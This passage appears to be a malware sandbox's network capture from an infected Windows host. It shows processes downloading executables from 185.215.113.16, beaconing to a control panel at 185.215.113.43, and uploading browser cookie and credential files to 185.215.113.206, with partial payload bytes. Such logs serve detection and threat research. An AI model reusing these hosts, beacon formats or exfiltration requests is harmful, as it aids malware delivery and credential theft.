Nov 4, 2024 17:32:42.164268017 CET	1236	IN	Data Raw: 93 e5 08 50 27 d3 99 2c 7e 11 c2 3d e0 c2 63 29 31 31 76 70 d9 c8 cb 17 22 e7 a8 09 c1 c1 79 74 11 05 34 50 03 cf 1b 29 3f 8c 70 a8 35 e7 82 28 d6 af db 95 e6 83 a7 99 ed a0 33 70 96 52 c0 1b 51 6d 52 b1 26 27 1c 9e 9b f2 f3 d3 4c 17 83 28 aa af Data Ascii: P',~=c)11vp"yt4P)?p5(3pRQmR&'L(Fz!kvo3Q3BKuc/2('/>l"subP'bc)\1mS&'>* /7e&L&WBeH+9R6 nl ("6's7eR*!@
Nov 4, 2024 17:32:42.169758081 CET	1236	IN	Data Raw: 26 65 cf 2b 12 ab bc 5b c3 4b 81 ba 73 7f 56 df 2e 77 a0 92 e6 d9 70 7a 0a a5 43 cc ed 8f 2e d8 d2 96 a0 83 a4 ec 07 9d 1b 73 a1 82 56 b1 eb cb 51 c9 7b 50 16 ae cd 5f 6d 67 e8 c3 48 f6 70 dc 34 30 88 15 20 04 8b ba 55 9a de c7 29 25 d4 13 4e 34 Data Ascii: &e+[KsV.wpzC.sVQ{P_mgHp40 U)%N4W)gyI5G-K@veNYDHQ~&E&<7If$Wl"B$1&d#\|&a8D`+;)qeo3m<atu^}&^\|D98{,8y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	50026	185.215.113.16	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:41.251882076 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 4, 2024 17:32:42.214529037 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:42 GMT Content-Type: application/octet-stream Content-Length: 2795520 Last-Modified: Mon, 04 Nov 2024 15:51:04 GMT Connection: keep-alive ETag: "6728ed68-2aa800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 c8 d6 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ + `@ `+`Ui` @ @.rsrc`2@.idata 8@lkuaxvtl`H:@phfhxxut +@.taggant@ +"*@
Nov 4, 2024 17:32:42.214549065 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:42.214564085 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:42.214574099 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:42.214601040 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:42.214613914 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:42.214627981 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:32:42.214638948 CET	1236	IN	Data Raw: 2c c9 e2 50 04 2a e3 ad 8c 05 e1 15 9f 4f 3e 47 2b 56 48 b7 eb f0 35 f7 d8 df 17 96 72 50 a7 bd e4 4d 8d cc 4e 32 68 77 57 9a 1f 5d 7e f4 d3 90 bb dc 03 47 f6 c3 d6 9b 8d f2 e0 99 bd c4 9a a2 bf cb f3 57 04 c6 ef 7f e8 ef 02 9d 9b d5 e0 20 c6 a2 Data Ascii: ,P*O>G+VH5rPMN2hwW]~GW L>r,ntn)5T[bOS=G~3>PQ]%ZJn"aBoH3_V:
Nov 4, 2024 17:32:42.214651108 CET	1236	IN	Data Raw: 38 ce f9 7d 40 ce fd b1 28 a5 82 5e 85 ed f7 c6 ca e5 f3 59 1c f0 15 b6 db 46 1d 6d a0 0d ed 50 ca e5 2d b7 2d 2d 31 52 53 b0 6f d5 a0 ce 39 57 ca 29 f9 05 1c 01 49 43 ee 6a 53 19 c8 ed 55 be 1b e2 8d 3a 85 49 e6 ef a0 4d 05 50 0a d2 6d 25 32 75 Data Ascii: 8}@(^YFmP---1RSo9W)ICjSU:IMPm%2uuq:}G]KaaWyq!^7!/~Fb-Rh3^IGw6tkmK`H\|@P }Z(g\|oI_:MW2P<UH
Nov 4, 2024 17:32:42.214664936 CET	1236	IN	Data Raw: e3 eb f2 6e 16 f5 f9 a2 fc 26 a9 50 b7 a1 e9 dc b1 b0 fb 05 f0 de 1d 8e 84 17 28 76 11 95 4f f3 e6 e6 27 00 8e 4a 1b ac 3a 14 ce a3 ab d3 2e fe fa cd 4d 67 80 20 6a 71 ba bd 57 71 ed 10 49 3a 32 de 45 46 bc 14 3d 68 b3 9b 8e 51 08 7e 12 21 4f a7 Data Ascii: n&P(vO'J:.Mg jqWqI:2EF=hQ~!O0H` !1Nf\|g+0`Pqrz]2'\ .AJsuAK}<cMnPFy ']:E{3.vy
Nov 4, 2024 17:32:42.219614983 CET	1120	IN	Data Raw: 88 06 c2 8a d2 d1 d8 b9 af 55 de ac 66 b1 1b b0 9f de e7 10 9e d1 39 a5 9a fb c5 0e 83 c6 c4 41 9e c1 3f 6b cd d2 8b e3 1f aa d5 1f e1 80 f7 c6 cb 8f 52 6c e3 23 01 95 cb b3 eb 7c e8 12 45 6b 98 2c 43 52 ee 10 3a 86 4a ee e4 e0 5a 24 48 12 ea 95 Data Ascii: Uf9A?kRl#\|Ek,CR:JZ$H?lZXfM!G&C>0J_'t;_GT@WSaFG^'H16z~aaOVk&x:CoEerbQ?f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	50053	34.107.221.82	80	3276	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:49.938776016 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:32:50.534488916 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59363 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:32:53.071726084 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:32:53.198529005 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59366 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	50060	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:51.632795095 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 33 38 39 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003899001&unit=246122658369
Nov 4, 2024 17:32:52.536251068 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	50062	185.215.113.206	80	2472	C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:51.705951929 CET	629	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH Host: 185.215.113.206 Content-Length: 427 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------CFCBFBGDBKJKECAAKKFH--
Nov 4, 2024 17:32:53.121646881 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:32:53.456737041 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="file"------CBGHCAKKFBGDHJJJKECF--
Nov 4, 2024 17:32:54.555716038 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:32:54.556005001 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:32:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	50065	34.107.221.82	80	3276	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:52.063666105 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 4, 2024 17:32:52.668225050 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1712 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 4, 2024 17:32:52.881114006 CET	215	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 04 Nov 2024 16:04:20 GMT Age: 1712 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	50072	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:54.578135967 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:32:55.462306976 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50074	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:32:57.485165119 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:32:58.287333012 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:32:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50082	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:00.375952005 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:01.253524065 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50106	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:02.894706964 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:33:03.931478024 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50108	185.215.113.16	80	1120	C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:03.198868036 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 4, 2024 17:33:04.116625071 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:03 GMT Content-Type: application/octet-stream Content-Length: 2124288 Last-Modified: Mon, 04 Nov 2024 16:30:39 GMT Connection: keep-alive ETag: "6728f6af-206a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng, r@Pr !@P.d. p.v@.rsrc .@.idata .@ ).@fawplrfxPX@jtmuhxjqrB @.taggant0 r"H @
Nov 4, 2024 17:33:04.116651058 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:33:04.116663933 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:33:04.116673946 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:33:04.116686106 CET	448	IN	Data Raw: 67 aa 18 40 31 8e b1 91 30 b6 ed 4f 82 ae b7 31 13 c5 3b 2b 83 e1 cb 13 2e 0c 87 79 c2 9d 2d d8 ef ab 65 ff c5 74 08 94 a3 1c 88 30 f0 ad 82 ab bb 14 74 1c 72 a4 64 41 33 4b ac 79 09 b4 e4 4b 31 28 7b 66 8a af f1 df ac b7 a9 e9 58 9a 34 68 68 67 Data Ascii: g@10O1;+.y-et0trdA3KyK1({fX4hhglra17asds1<\|.;` /~/t5sOcKk!Y5L57B<f/^_N"Y8!^0X;FEHN;n@Vs
Nov 4, 2024 17:33:04.116744041 CET	1236	IN	Data Raw: 2a 07 0c 78 4c 20 a8 1d 20 d3 4e 64 e3 81 26 6b 7d 4c c3 5f 16 b0 01 bc ed a2 2b 2a c9 6c 36 43 9a a7 30 f9 ee 25 5f 40 88 2c 3b 60 03 a5 b6 c4 d4 1e 5f 9a e1 cb 72 32 b8 9b 02 f1 b0 97 5f 98 13 0b 74 32 f9 c7 bc 4f b8 cf db f5 05 f4 e3 27 e0 2c Data Ascii: xL Nd&k}L_+l6C0%_@,;`_r2_t2O',_40"4-4&ec`KSzf'\|K6f{U$>(OGVT'{{N3ZG,&s;BjYm:)bf2Rtb_a-V
